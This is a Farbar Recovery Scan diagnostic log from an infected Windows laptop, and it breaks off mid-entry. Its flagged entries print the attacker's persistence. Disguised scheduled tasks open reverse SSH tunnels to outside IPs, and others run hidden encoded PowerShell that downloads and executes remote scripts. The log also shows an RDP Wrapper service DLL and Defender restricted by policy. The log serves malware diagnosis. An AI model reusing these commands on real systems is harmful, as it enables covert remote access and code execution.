Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-08-2026 01 Ran by PG (administrator) on PGHP (HP HP ENVY x360 Convertible 15-cn0xxx) (05-08-2026 03:10:45) Running from C:\Users\PG\Downloads\FRST64.exe Loaded Profiles: PG Platform: Microsoft Windows 10 Home Version 22H2 19045.6216 (X64) Language: English (United States) Default browser: Edge Boot Mode: Normal ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (C:\Program Files\mcafee\WebAdvisor\servicehost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\mcafee\WebAdvisor\uihost.exe (DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\SysInfoCap.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\BridgeCommunication.exe (DriverStore\FileRepository\igdlh64.inf_amd64_1c41cc68747d972b\igfxCUIService.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1c41cc68747d972b\igfxEM.exe (explorer.exe ->) (1539F157-3B11-4C68-B0C7-6E8113B7B1BD -> ) C:\Program Files\WindowsApps\15191PeakPlayer.NeatOffice_3.4.12.0_x64__y5c4dfz5b21fm\FileWatcher\FileWatcher.exe (explorer.exe ->) (Alexandr Irza) [File not signed] C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (explorer.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (explorer.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_be03f2dca68bf962\RtkAudUService64.exe (Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Intel\DPTF\esif_uf.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\Intel\DPTF\dptf_helper.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <16> (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\151.0.4129.59\msedgewebview2.exe <5> (Realtek Semiconductor Corp. -> Realtek) C:\Program Files (x86)\Realtek\PCIE Wireless LAN\RtlS5Wake\RtlS5Wake.exe (SECOMN64.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Sound Research, Corp.) C:\Windows\System32\SECOCL64.exe (services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (services.exe ->) (Conexant Systems LLC -> Conexant Systems LLC.) C:\Windows\System32\CxAudioSvc.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP JumpStart Bridge\HPJumpStartBridge.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpanalyticscomp.inf_amd64_ef460d1f2a35fc16\x64\TouchpointAnalyticsClientService.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\AppHelperCap.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\DiagsCap.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\NetworkCap.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\SysInfoCap.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iastorac.inf_amd64_ba273d0ffb93e225\RstMwService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\sgx_psw.inf_amd64_ece153ca769ec179\aesm_service.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\Intel\DPTF\esif_uf.exe (services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Windows\SysWOW64\XtuService.exe (services.exe ->) (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1c41cc68747d972b\igfxCUIService.exe (services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1c41cc68747d972b\IntelCpHDCPSvc.exe (services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1c41cc68747d972b\IntelCpHeciSvc.exe (services.exe ->) (Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (services.exe ->) (Intel(R) Trust Services -> Intel(R) Corporation) C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\SocketHeciServer.exe (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\mcafee\WebAdvisor\servicehost.exe (services.exe ->) (Microsoft Corporation -> ) C:\Program Files\OpenSSH\sshd.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\151.0.4129.59\elevation_service.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Program Files (x86)\Realtek\REALTEK Bluetooth\BTDevMgr.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Sound Research, Corp.) C:\Windows\System32\SECOMN64.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\MpDefenderCoreService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\NisSrv.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_be03f2dca68bf962\RtkAudUService64.exe (services.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnhService.exe (svchost.exe ->) () [File not signed] C:\Users\PG\.ssh\ssh.exe (svchost.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (svchost.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP JumpStart Launch\HPJumpStartLaunch.exe (svchost.exe ->) (HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Users\PG\AppData\Local\Microsoft\OneDrive\26.123.0628.0001\FileCoAuth.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe (SynTPEnhService.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnh.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_be03f2dca68bf962\RtkAudUService64.exe [3498472 2022-06-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [320584 2018-02-13] (Intel(R) Rapid Storage Technology -> Intel Corporation) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9274312 2018-05-14] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [709152 2018-03-22] (HP Inc. -> HP Inc.) HKLM-x32\...\Run: [RtlS5Wake] => C:\Program Files (x86)\Realtek\PCIE Wireless LAN\RtlS5Wake\RtlS5Wake.exe [2097600 2018-02-23] (Realtek Semiconductor Corp. -> Realtek) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION HKLM\SYSTEM\...\Terminal Server: [fDenyTSConnections] = 0 <==== ATTENTION HKU\S-1-5-21-3754613442-372446698-354282701-1001\...\Run: [Volume2] => C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe [10368512 2025-09-21] (Alexandr Irza) [File not signed] <==== ATTENTION HKU\S-1-5-21-3754613442-372446698-354282701-1001\...\Run: [MicrosoftEdgeAutoLaunch_7781B9C2F2884B5360BCBF3973917872] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [5024072 2026-07-31] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-3754613442-372446698-354282701-1001\...\Policies\Explorer: [HideSCAVolume] 0 ==================== Scheduled Tasks (Whitelisted) ================= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {515128B5-1654-4693-BC9F-4ACB4FE0FC93} - System32\Tasks\Apple Sync => C:\Users\PG\.ssh\ssh.exe [946176 2026-07-09] () [File not signed] -> -N -R 54985:localhost:109 PiBZinY2y71@104.243.32.213 -i "C:\Users\PG\.ssh\\PiBZinY2y71.54985" -f "C:\Users\PG\.ssh\config" <==== ATTENTION Task: {88501F15-2296-4DCC-9469-82471C022F61} - System32\Tasks\GDrive Backup Sync => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -ep bypass -w hidden -nop -enc JABMAGkAbgBrAEkARQBYACAAPQAgACcAaAB0AHQAcABzADoALwAvAGsAYgBlAGEAdQB0AHkAcgBlAHYAaQBlAHcAcwAuAGMAbwBtACcAOwAKACQAQwA9AGkAdwByACAAJABMAGkAbgBrAEkARQBYACAALQBVAHMARQBCAGEAUwBJAGMAUABBAHIAcwBpAE4AZwAgAHwAaQBlAHgAOwA= <==== ATTENTION Task: {8FCB9FC7-02BC-4E3A-BA8F-FAEC68EB6594} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem148.0.7730.0{AC5F7D3C-FA14-496B-82D0-618B6BD2D328} => C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe [8459416 2026-03-12] (Google LLC -> Google LLC) Task: {C10BB470-4591-445C-8CEF-3A65BA164564} - System32\Tasks\GoogleUpdaterTask => C:\Users\PG\.ssh\ssh.exe [946176 2026-07-09] () [File not signed] -> -N -R 54985:localhost:109 PiBZinY2y71@62.210.188.209 -i "C:\Users\PG\.ssh\PiBZinY2y71.54985" -f "C:\Users\PG\.ssh\config" <==== ATTENTION Task: {D13B5B2D-DA5A-4FAA-A7A7-0AF910D9AC44} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [198696 2017-09-27] (HP Inc. -> HP Inc.) -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\-task -source HPSA Task: {F24687EF-6C53-4420-B0D8-40A919605EEC} - System32\Tasks\Hewlett-Packard\HP Diagnostics\ABO => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://ABO Task: {6AF235A0-CED5-4271-91F6-BDF9F74B36F8} - System32\Tasks\Hewlett-Packard\HP Diagnostics\BatteryStatusError => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://BatteryStatusError Task: {BF872530-E619-4FE7-AAAF-9A51983D4445} - System32\Tasks\Hewlett-Packard\HP Diagnostics\BatteryStatusTest => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://BatteryStatusTest Task: {3B10519C-FB04-438C-9E6A-233BCA2F8088} - System32\Tasks\Hewlett-Packard\HP Diagnostics\BCF => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://BCF Task: {46F0A906-497D-4510-A16C-6EB8FDEA9420} - System32\Tasks\Hewlett-Packard\HP Diagnostics\BHM1 => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://BHM1 Task: {307B3143-B24D-45CB-BD70-BD00C4EF9B1A} - System32\Tasks\Hewlett-Packard\HP Diagnostics\BHM2 => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://BHM2 Task: {27329340-8023-4730-BF91-155BFD1B6B20} - System32\Tasks\Hewlett-Packard\HP Diagnostics\LaunchUI => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://LaunchUI Task: {A90D6C11-CF26-4711-A5A6-94A839BB87A6} - System32\Tasks\Hewlett-Packard\HP Diagnostics\ShowUI => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags: Task: {3320B944-EDA8-418E-B797-82B9D4C8E50F} - System32\Tasks\Hewlett-Packard\HP Diagnostics\SmartCheckError => C:\WINDOWS\system32\cmd.exe [289792 2024-05-16] (Microsoft Windows -> Microsoft Corporation) -> /c start hpdiags://SmartCheckError Task: {0A89A316-44DC-4D7B-96D3-4E1AD3F73FC3} - System32\Tasks\Hewlett-Packard\HP Diagnostics\Uninstall-BatteryStatusTest => c:\Windows\System32\schtasks.exe [268800 2025-06-13] (Microsoft Windows -> Microsoft Corporation) -> /Change /Disable /tn "\Hewlett-Packard\HP Diagnostics\BatteryStatusTest" Task: {3F33BDCB-ECC0-44D5-AB87-46B249BCA2B2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [1490800 2017-09-27] (HP Inc. -> HP Inc.) -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\\/taskrestart Task: {B35E898F-C8E1-4600-A5DC-E60548F4921D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [119664 2017-09-27] (HP Inc. -> HP Inc.) Task: {A0DB3062-EB12-43AC-9E9A-46AFF93E084B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [651632 2017-09-27] (HP Inc. -> HP Inc.) -> C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\\/u Task: {DCD12CCF-7BA0-4176-BD96-D1C3A3282DE2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe -> C:\Program Files\Hewlett-Packard\HP Support Framework\\/L Analysis Task: {EB0F0862-DB81-4ED9-8472-AFA14B9CDFDE} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [216432 2017-09-27] (HP Inc. -> HP Inc.) -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\\/noreport Task: {0BDD66DB-A5E8-4542-89F5-58F30D7551C8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1057648 2017-09-27] (HP Inc. -> HP Inc.) Task: {0576DE06-1203-4895-B163-B2A4BC03E46F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1057648 2017-09-27] (HP Inc. -> HP Inc.) Task: {7258984A-FE1D-40B9-8683-6215F558D238} - System32\Tasks\HPAudioSwitch => C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe [1644960 2017-02-02] (HP Inc. -> HP Inc.) Task: {2C2CA836-45F8-42BA-A1AD-02BE8627A98E} - System32\Tasks\HPCeeScheduleForPG => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [99208 2016-06-25] (Hewlett-Packard Company -> HP Inc.) Task: {78A1E1BC-BDF6-4C92-B296-7CA1757A3D95} - System32\Tasks\HPEA3JOBS => C:\Program -> Files\HP\HP ePrint\hpeprint.exe /CheckJobs Task: {7881EA20-88E3-4D41-8262-48908CC3777F} - System32\Tasks\HPJumpStartLaunch => C:\Program Files (x86)\HP\HP JumpStart Launch\HPJumpStartLaunch.exe [461824 2017-10-06] (HP Inc. -> HP Inc.) Task: {D793DE97-FB81-4141-B4C4-A0A083536D22} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26060.3008-0\MpCmdRun.exe [1893920 2026-07-07] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {ED2BE71A-626C-423C-A3A6-0D7C9D95EA69} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26060.3008-0\MpCmdRun.exe [1893920 2026-07-07] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {FE131927-A90D-42B9-894F-493B65EEBD1E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26060.3008-0\MpCmdRun.exe [1893920 2026-07-07] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C5508CFC-CDE1-45C1-94C5-6F849BA7B4D8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26060.3008-0\MpCmdRun.exe [1893920 2026-07-07] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7001A7FB-6212-4B23-9D2C-E582788FAEB8} - System32\Tasks\OneDrive Reporting => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -ep bypass -w hidden -nop -enc JABDAD0AaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AcgBlAGMAYQB2AGIAMgAyAC4AbwBuAGwAaQBuAGUAIAAtAFUAcwBFAEIAYQBTAEkAYwBQAEEAcgBzAGkATgBnACAAfABpAGUAeAA= <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\HPCeeScheduleForPG.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.) Tcpip\Parameters: [DhcpNameServer] 192.168.12.1 Tcpip\..\Interfaces\{5c531736-a5e7-47ee-86d4-f7aac73958ec}: [DhcpNameServer] 192.168.12.1 Tcpip\..\Interfaces\{5c531736-a5e7-47ee-86d4-f7aac73958ec}: [DhcpDomain] lan Tcpip\..\Interfaces\{5c531736-a5e7-47ee-86d4-f7aac73958ec}\953413021212: [DhcpNameServer] 75.75.75.75 75.75.76.76 Tcpip\..\Interfaces\{5c531736-a5e7-47ee-86d4-f7aac73958ec}\953413021212: [DhcpDomain] hsd1.tx.comcast.net Edge: ======= Edge DefaultProfile: Default Edge Profile: C:\Users\PG\AppData\Local\Microsoft\Edge\User Data\Default [2026-08-05] Edge HomePage: Default -> hxxp://yahoo.com/ Edge StartupUrls: Default -> "hxxps://www.bing.com/search?q=My+Yahoo&FORM=SNAPST&filters=sid:%229898073c-c46b-2c4f-88ac-ebc9163f80fd%22+fcid:%22GeneratedCarousel-aa53299b-b145-abb4-321d-7990671976b3%22&crslsl=0&efirst=1","hxxps://www.yahoo.com/","hxxps://search.yahoo.com/search?p=make+yahoo+home+page+one+click&fr=yfp-t-s&fr2=p%3Afp%2Cm%3Asa%2Cct%3Asa%2Ckt%3Anone&ei=UTF-8&fp=1","hxxps://uk.help.yahoo.com/kb/SLN2208.html","hxxps://support.microsoft.com/en-us/microsoft-edge/change-your-browser-home-page-a531e1b8-ed54-d057-0262-cc5983a065c6" Edge DefaultSearchURL: Default -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=edge&addonversion=12.7.0&method=topbar Edge DefaultSearchKeyword: Default -> ecosia.org Edge DefaultSuggestURL: Default -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US Edge Extension: (Ecosia) - C:\Users\PG\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fhfidmlnclkepgapcephbaciajegheco [2026-08-04] Edge Extension: (Edge relevant text changes) - C:\Users\PG\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-01-24] Edge HKLM-x32\...\Edge\Extension: [fdhgeoginicibhagdmblfikbgbkahibd] ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [679400 2018-04-02] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [1322632 2017-12-13] (HP Inc. -> HP Inc.) R2 HPAppHelperCap; C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\AppHelperCap.exe [932032 2026-07-08] (HP Inc. -> HP Inc.) R2 HPDiagsCap; C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\DiagsCap.exe [929984 2026-07-08] (HP Inc. -> HP Inc.) R2 HPJumpStartBridge; c:\Program Files (x86)\HP\HP JumpStart Bridge\HPJumpStartBridge.exe [477184 2017-10-06] (HP Inc. -> HP Inc.) R2 HPNetworkCap; C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\NetworkCap.exe [925888 2026-07-08] (HP Inc. -> HP Inc.) S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-04] (Hewlett-Packard Company -> HP) R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [323952 2017-09-27] (HP Inc. -> HP Inc.) R2 HPSysInfoCap; C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_166246cb8bd387ff\x64\SysInfoCap.exe [1029832 2026-07-08] (HP Inc. -> HP Inc.) R2 HpTouchpointAnalyticsService; C:\WINDOWS\System32\DriverStore\FileRepository\hpanalyticscomp.inf_amd64_ef460d1f2a35fc16\x64\TouchpointAnalyticsClientService.exe [639784 2025-10-02] (HP Inc. -> HP Inc.) R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [628768 2017-07-13] (HP Inc. -> HP Inc.) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [889048 2026-07-29] (McAfee, LLC -> McAfee, LLC) R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\MpDefenderCoreService.exe [2113568 2026-08-05] (Microsoft Windows Publisher -> Microsoft Corporation) R2 SECOMNService; C:\WINDOWS\System32\SECOMN64.exe [741832 2022-02-24] (Microsoft Windows Hardware Compatibility Publisher -> Sound Research, Corp.) R2 sshd; C:\Program Files\OpenSSH\sshd.exe [771640 2024-10-10] (Microsoft Corporation -> ) S4 TermService; C:\WINDOWS\system32\rdpwrap.dll [116736 2026-08-01] (Stas'M Corp.) [File not signed] <==== ATTENTION (no ServiceDLL) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\NisSrv.exe [5183648 2026-08-05] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26070.9-0\MsMpEng.exe [291352 2026-08-05] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus2.sys [159600 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 HPCustomCapDriver; C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapdriver.inf_amd64_1421dec2010cc057\x64\hpcustomcapdriver.sys [18984 2024-05-07] (Microsoft Windows Hardware Compatibility Publisher -> HP Inc.) R3 KslD; C:\WINDOWS\System32\drivers\wd\KslD.sys [82312 2026-05-20] (Microsoft Windows -> Microsoft Corporation) S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64880 2020-11-11] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated) S4 WdAiNisDrv; C:\WINDOWS\System32\drivers\wd\WdAiNisDrv.sys [51224 2026-08-05] (Microsoft Windows -> Microsoft Corporation) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [21632 2026-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [625688 2026-08-05] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [111640 2026-08-05] (Microsoft Windows -> Microsoft Corporation) R3 WirelessButtonDriver64; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [40208 2026-06-18] (HP Inc. -> HP) U3 aspnet_state; no ImagePath S3 MpKsl9ef9127d; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{CECC7104-C57B-4D3A-99D1-43728E1B3A4B}\MpKslDrv.sys (No File) ==================== SvcHost (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) (Whitelisted) ========= (If an entry is included in the fixlist, the file/folder will be moved.) 2026-08-05 03:10 - 2026-08-05 03:12 - 000026113 _____ C:\Users\PG\Downloads\FRST.txt 2026-08-05 03:07 - 2026-08-05 03:08 - 002448896 _____ (Farbar) C:\Users\PG\Downloads\FRST64.exe 2026-08-04 23:35 - 2026-08-04 23:35 - 000046272 _____ C:\Users\PG\Desktop\FARBAR SCAN.txt 2026-08-04 23:09 - 2026-08-05 03:11 - 000000000 ____D C:\FRST 2026-08-04 23:08 - 2026-08-04 23:08 - 000001490 _____ C:\Users\PG\Desktop\FRST64 (1) - Shortcut.lnk 2026-08-04 22:21 - 2026-08-04 22:21 - 000001943 _____ C:\Users\PG\Desktop\Malwarebytes Threat Scan Report 2026-08-04 220013.txt 2026-08-04 21:38 - 2026-08-04 21:38 - 000000000 ____D C:\Users\PG\AppData\Local\Sentry 2026-08-04 20:33 - 2026-08-04 20:33 - 000000000 ____D C:\Users\PG\AppData\Roaming\Volume2 2026-08-04 18:45 - 